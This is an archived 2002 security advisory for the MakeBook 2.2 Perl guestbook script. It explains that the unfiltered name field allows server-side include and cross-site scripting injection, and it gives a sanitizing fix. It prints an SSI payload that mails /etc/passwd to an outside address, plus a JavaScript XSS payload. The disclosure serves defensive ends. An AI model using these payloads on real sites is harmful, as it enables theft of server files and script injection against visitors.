OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: DownBload (downbloadhotmail.com)
Date: Wed Jun 12 2002 - 02:22:06 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is)       [ DownBload Security Research Lab Advisory ]
    [-------------------------------------------------------------------------]
    Advisory name: SSI & CSS execution in MakeBook 2.2
    Advisory number: 5
    Application: MakeBook 2.2 (CGI script)
    Application author: Kristina Pfaff-Harris
    Source: http://www.tesol.net/scriptmail.html
    Date: 12.6.2002
    Impact: remote user can execute shell commands & cross site scripting
    Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
    Discovered by: DownBload
    Mail me : downbloadhotmail.com




    ------[ Overview

    "...MakeBook v2.2 is a simple program which can be used as a guestbook,
    an ongoing writing project where each person adds to an ongoing story,
    a comment board, or even a way to let people add comments to many
    individual pages. It allows a user to enter their name, email address,
    and some text which will then be added to the "bookfile". Originally
    intended for use in writing a continuing story or journal, where
    different students could add to the story as they went along, it has
    evolved into a more flexible system which allows the owner to choose
    how the "book" entries should appear, and even what pages they appear
    on..."


                                       

    ------[ Problem
            
    Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse.
    It works fine, but troubles comes when you look for security measures in
    program. When you want to sign guestbook, you have to write your name,
    email address, and some text. Script does remove 'some' special-char in
    $text, but script doesn't replace special-chars in $name at all, and
    because
    of that, it is possible instead of name, enter and execute some SSI(Server
    Side Includes) or CSS(Cross Site Scripting) code.
    'Buggy' code:
    ...
    $name =$data{"Name"};
    $email =$data{"Email"};
    $text =$data{"Text"};
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    ...




    ------[ Examples

    SSI attack
    ~~~~~~~~~~
    Name: <!--#exec cmd="/bin/mail downbloadhotmail.com < /etc/passwd"-->
    E-mail: downbloadhotmail.com
    Text: I hacked you, my kung-fu is the best... ;)

    CSS attack
    ~~~~~~~~~~
    Name: <img src="javascript:alert('HACKED BY DOWNBLOAD');">
    E-mail: downbloadhotmail.com
    Text: I hacked you, my kung-fu is the best... ;)

    I won't give you more examples, use your own imagination :).
    BTW: SSI attack depends on web server, because some web servers
    comes with, and some without support for SSI.




    ------[ Solution

    Solution for this bug would be to filter special characters from user
    input. For now, you can use this:

    ...
    $name = $data{"Name"};
    $name =~ s/</&lt;/g;
    $name =~ s/>/&gt;/g;

    $email = $data{"Email"};
    $email =~ s/</&lt;/g;
    $email =~ s/>/&gt;/g;

    $text = $data{"Text"};
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    ...




    ------[ Greetz

    Greetz goes to #hr.hackers <irc.carnet.hr>.
    Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout,
    h4z4rd, fi, Fr1c, harlequin and www.active-security.org.